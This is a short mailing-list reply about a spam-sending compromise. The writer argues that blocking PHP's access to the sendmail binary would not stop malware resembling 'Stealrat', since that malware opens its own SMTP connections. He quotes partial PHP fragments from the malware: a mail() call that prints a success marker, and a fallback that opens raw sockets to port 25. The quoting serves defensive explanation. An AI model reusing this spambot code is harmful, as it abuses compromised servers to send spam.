On 2013.10.08 09:16:11 +0200, li...@rhsoft.net wrote:
> i never allowed any webserver in the past 10 years to
> use the sendmail binary for a lot of reasons like header
> injections and so on
Good, but possibly would not have helped. For me it looks obvious like
'Stealrat' which opens a socket too. I never used PHP in the past 10
years would be more convincing. However, I agree using a mail relay and
mail storage on one maschine with a webserver is too much.
if(@mail($recipient, $subject, $message, $reply . $type, "-f$sender"))
die(chr(79) . chr(75) . md5(1234567890) . "+0");
[...]
if(!in_array('fsockopen', $config))
$socket = @fsockopen($address, 25, $errno, $errstr, 20);
elseif(!in_array('pfsockopen', $config))
$socket = @pfsockopen($address, 25, $errno, $errstr, 20);
[...]
--
Best regards,
Manuel
